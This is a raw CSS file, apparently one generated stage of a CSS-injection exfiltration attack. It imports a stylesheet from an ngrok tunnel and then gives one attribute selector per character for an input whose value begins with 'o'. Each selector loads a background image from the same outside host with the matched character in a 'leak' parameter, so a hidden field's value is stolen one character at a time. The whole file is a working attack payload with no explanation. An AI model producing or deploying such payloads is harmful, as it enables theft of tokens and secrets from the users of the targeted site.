@import url("http://bc0a37bcf1d5.ngrok.io/?l=3");
input[value="o!"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=!&q=0.7769924289743884");}
input[value="o\""] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=\"&q=0.030439915098923853");}
input[value="o#"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=#&q=0.81073183679178");}
input[value="o$"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=$&q=0.22677030391173925");}
input[value="o%"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=%&q=0.15629127717833113");}
input[value="o&"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&&q=0.9816659616357624");}
input[value="o'"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak='&q=0.4540954079186226");}
input[value="o("] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=(&q=0.034133009538982906");}
input[value="o)"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=)&q=0.6648557872301255");}
input[value="o*"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=*&q=0.7874614173046917");}
input[value="o+"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=+&q=0.3261376251475767");}
input[value="o,"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=,&q=0.9438253025403573");}
input[value="o-"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=-&q=0.5171192853531712");}
input[value="o."] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=.&q=0.5238897702281466");}
input[value="o/"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=/&q=0.2892577370029088");}
input[value="o0"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=0&q=0.3711000232887367");}
input[value="o1"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=1&q=0.0341672978837253");}
input[value="o2"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=2&q=0.5685617969420522");}
input[value="o3"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=3&q=0.5810340700430816");}
input[value="o4"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=4&q=0.2854006576984116");}
input[value="o5"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=5&q=0.24197909852528698");}
input[value="o6"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=6&q=0.502429183212012");}
input[value="o7"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=7&q=0.2965307226022704");}
input[value="o8"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=8&q=0.3830500731094788");}
input[value="o9"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=9&q=0.8363194765957138");}
input[value="o:"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=:&q=0.06443692810585877");}
input[value="o;"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=;&q=0.774548478419522");}
input[value="o<"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=<&q=0.5892427118708978");}
input[value="o="] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak==&q=0.8891799246382224");}
input[value="o>"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=>&q=0.505971322822272");}
input[value="o?"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=?&q=0.7972085262072308");}
input[value="o@"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=@&q=0.4081682415951251");}
input[value="oA"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=A&q=0.004610764151097069");}
input[value="oB"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=B&q=0.6211011369082409");}
input[value="oC"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=C&q=0.021211307036322014");}
input[value="oD"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=D&q=0.21602774433716854");}
input[value="oE"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=E&q=0.8031474831947165");}
input[value="oF"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=F&q=0.06647795454254424");}
input[value="oG"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=G&q=0.6748544448830869");}
input[value="oH"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=H&q=0.41378707342984566");}
input[value="oI"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=I&q=0.4757880249980233");}
input[value="oJ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=J&q=0.9396145497112831");}
input[value="oK"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=K&q=0.9717099069450668");}
input[value="oL"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=L&q=0.8568855890649638");}
input[value="oM"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=M&q=0.4873513702619594");}
input[value="oN"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=N&q=0.2717309791973417");}
input[value="oO"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=O&q=0.20132198054207273");}
input[value="oP"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=P&q=0.33419635097964595");}
input[value="oQ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Q&q=0.5201819460559849");}
input[value="oR"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=R&q=0.40966187272101773");}
input[value="oS"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=S&q=0.15290830052563154");}
input[value="oT"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=T&q=0.9979020679867985");}
input[value="oU"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=U&q=0.1789070014326164");}
input[value="oV"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=V&q=0.1912356662881276");}
input[value="oW"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=W&q=0.8091170294025332");}
input[value="oX"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=X&q=0.0828997394940072");}
input[value="oY"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Y&q=0.043507124162944555");}
input[value="oZ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Z&q=0.7248560491199911");}
input[value="o["] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=[&q=0.7562024664618536");}
input[value="o\\"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=\\&q=0.3094053526482152");}
input[value="o]"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=]&q=0.3990974186629275");}
input[value="o^"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=^&q=0.355647257500298");}
input[value="o_"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=_&q=0.9644122808120656");}
input[value="o`"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=`&q=0.9267368625326573");}
input[value="oa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=a&q=0.44128305252623434");}
input[value="ob"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=b&q=0.9523749877172034");}
input[value="oc"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=c&q=0.6781532572016806");}
input[value="od"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=d&q=0.8103613963664398");}
input[value="oe"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=e&q=0.12690137663895507");}
input[value="of"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=f&q=0.27951965129741385");}
input[value="og"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=g&q=0.5833273001457853");}
input[value="oh"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=h&q=0.3281822193219295");}
input[value="oi"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=i&q=0.02430560748586652");}
input[value="oj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=j&q=0.3079995361255681");}
input[value="ok"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=k&q=0.19479214749161788");}
input[value="ol"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=l&q=0.48136263741707586");}
input[value="om"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=m&q=0.8869232412019055");}
input[value="on"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=n&q=0.6167651700887529");}
input[value="oo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=o&q=0.0923236477569338");}
input[value="op"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=p&q=0.9709947712576326");}
input[value="oq"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=q&q=0.6712081637926699");}
input[value="or"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=r&q=0.5158514775359258");}
input[value="os"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=s&q=0.44565169801505067");}
input[value="ot"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=t&q=0.0843864317093872");}
input[value="ou"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=u&q=0.11377541174907235");}
input[value="ov"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=v&q=0.4682643774215751");}
input[value="ow"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=w&q=0.010026352332605182");}
input[value="ox"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=x&q=0.8338173285393526");}
input[value="oy"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=y&q=0.09224369987725933");}
input[value="oz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=z&q=0.19222521096347922");}
input[value="o{"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak={&q=0.2563691019844192");}
input[value="o|"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=|&q=0.3923826500037422");}
input[value="o}"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=}&q=0.1294074094281119");}
input[value="o~"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=~&q=0.4027209979452784");}
input[value="o"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6366191369023408");}
input[value="o"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.5500759839069624");}
input[value="o"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.2646690131184728");}
input[value="o"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.5251849489513742");}
input[value="o"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.053760548716385026");}
input[value="o"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.05589300065724867");}
input[value="o"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9526032428842945");}
input[value="o"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6635159650798703");}
input[value="o"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.3838669853470089");}
input[value="o"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.25138443457389115");}
input[value="o"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8599609155349692");}
input[value="o"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9433547794656583");}
input[value="o"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.5157903056775051");}
input[value="o"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.04821891037909487");}
input[value="o"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.47849274348073045");}
input[value="o"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9883071832212447");}
input[value="o"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.029700935634552117");}
input[value="o"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.842136748712035");}
input[value="o"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.5750643786956142");}
input[value="o"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6023303700766494");}
input[value="o"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7167009472594854");}
input[value="o"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8870502432983227");}
input[value="o"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.72120591043887");}
input[value="o"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.37485069362658785");}
input[value="o"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.5033695596309342");}
input[value="o"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7725449030971103");}
input[value="o"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.798094455361199");}
input[value="o"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.19685360513050565");}
input[value="o"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.5877459288684523");}
input[value="o"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.25959967032278564");}
input[value="o"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.11252726698582216");}
input[value="o"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.5309642621718433");}
input[value="o"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9355292812034657");}
input[value="o "] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak= &q=0.18277981716046532");}
input[value="o¡"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¡&q=0.4163498980087281");}
input[value="o¢"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¢&q=0.7775483590245456");}
input[value="o£"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=£&q=0.9367144586325682");}
input[value="o¤"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¤&q=0.8924614979834096");}
input[value="o¥"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¥&q=0.17291176980058975");}
input[value="o¦"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¦&q=0.11035313735026708");}
input[value="o§"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=§&q=0.7858544689370068");}
input[value="o¨"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¨&q=0.23161107441476458");}
input[value="o©"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=©&q=0.9203992753421133");}
input[value="oª"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ª&q=0.6877987394950749");}
input[value="o«"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=«&q=0.6415140488244135");}
input[value="o¬"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¬&q=0.05384613431438745");}
input[value="o­"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=­&q=0.8246580039631617");}
input[value="o®"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=®&q=0.016275675248605737");}
input[value="o¯"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¯&q=0.6901293417098027");}
input[value="o°"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=°&q=0.19126051866599258");}
input[value="o±"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=±&q=0.8171073265559654");}
input[value="o²"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=²&q=0.8299908974918939");}
input[value="o³"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=³&q=0.6942615318247443");}
input[value="o´"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=´&q=0.6202021552809187");}
input[value="oµ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=µ&q=0.5498346837536978");}
input[value="o¶"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¶&q=0.06787369270526544");}
input[value="o·"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=·&q=0.7996266757623407");}
input[value="o¸"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¸&q=0.3608921299473533");}
input[value="o¹"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¹&q=0.24093577750405237");}
input[value="oº"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=º&q=0.2303935479423822");}
input[value="o»"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=»&q=0.006730679198896139");}
input[value="o¼"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¼&q=0.49881640210165434");}
input[value="o½"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=½&q=0.694215750649384");}
input[value="o¾"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¾&q=0.09992673579976286");}
input[value="o¿"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¿&q=0.4608332158816777");}
input[value="oÀ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=À&q=0.6692965842848704");}
input[value="oÁ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Á&q=0.30636172218783253");}
input[value="oÂ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Â&q=0.8906122262424025");}
input[value="oÃ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ã&q=0.7211960439099228");}
input[value="oÄ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ä&q=0.4134777672683272");}
input[value="oÅ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Å&q=0.10252969623904273");}
input[value="oÆ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Æ&q=0.33378000221038473");}
input[value="oÇ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ç&q=0.35528679224179327");}
input[value="oÈ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=È&q=0.2595311102663229");}
input[value="oÉ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=É&q=0.8249015931999217");}
input[value="oÊ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ê&q=0.9997619909853797");}
input[value="oË"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ë&q=0.3222982707677631");}
input[value="oÌ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ì&q=0.9679216888560525");}
input[value="oÍ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Í&q=0.17588465023875433");}
input[value="oÎ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Î&q=0.7134214055286168");}
input[value="oÏ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ï&q=0.09593557291198573");}
input[value="oÐ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ð&q=0.4386720905560444");}
input[value="oÑ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ñ&q=0.7778426031440087");}
input[value="oÒ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ò&q=0.32323539228652876");}
input[value="oÓ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ó&q=0.15077869939542854");}
input[value="oÔ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ô&q=0.6415034887653497");}
input[value="oÕ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Õ&q=0.4868787500529539");}
input[value="oÖ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ö&q=0.7344315160947188");}
input[value="o×"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=×&q=0.8599428381261973");}
input[value="oØ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ø&q=0.8481160139289401");}
input[value="oÙ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ù&q=0.6307278468169972");}
input[value="oÚ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ú&q=0.791761637858023");}
input[value="oÛ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Û&q=0.2861484673983381");}
input[value="oÜ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ü&q=0.28922835289517");}
input[value="oÝ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ý&q=0.19613377213364824");}
input[value="oÞ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Þ&q=0.15060559118851913");}
input[value="oß"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ß&q=0.8319967548901748");}
input[value="oà"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=à&q=0.9619062434519909");}
input[value="oá"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=á&q=0.1472525491560146");}
input[value="oâ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=â&q=0.5326740854532945");}
input[value="oã"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ã&q=0.2926252964833638");}
input[value="oä"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ä&q=0.12973503830003108");}
input[value="oå"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=å&q=0.7808280084068815");}
input[value="oæ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=æ&q=0.6984702250935817");}
input[value="oç"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ç&q=0.0835597341450518");}
input[value="oè"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=è&q=0.12602093922868463");}
input[value="oé"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=é&q=0.007592323925132094");}
input[value="oê"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ê&q=0.9873558077316071");}
input[value="oë"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ë&q=0.16866729278260761");}
input[value="oì"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ì&q=0.2387174274540611");}
input[value="oí"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=í&q=0.492247631217404");}
input[value="oî"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=î&q=0.6361912024387866");}
input[value="oï"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ï&q=0.4202865678233292");}
input[value="oð"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ð&q=0.20154874846574167");}
input[value="oñ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ñ&q=0.20754938831548841");}
input[value="oò"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ò&q=0.893559356613536");}
input[value="oó"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ó&q=0.33633204235141045");}
input[value="oô"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ô&q=0.9039500330551924");}
input[value="oõ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=õ&q=0.9300491059223617");}
input[value="oö"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ö&q=0.5908884457099017");}
input[value="o÷"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=÷&q=0.9859418178381854");}
input[value="oø"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ø&q=0.37607336059998886");}
input[value="où"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ù&q=0.3508201880344646");}
input[value="oú"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ú&q=0.8193534492978942");}
input[value="oû"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=û&q=0.8711876171088797");}
input[value="oü"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ü&q=0.7538196778231361");}
input[value="oý"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ý&q=0.49768380768169407");}
input[value="oþ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=þ&q=0.4701046078626301");}
input[value="oÿ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ÿ&q=0.9270175659748494");}
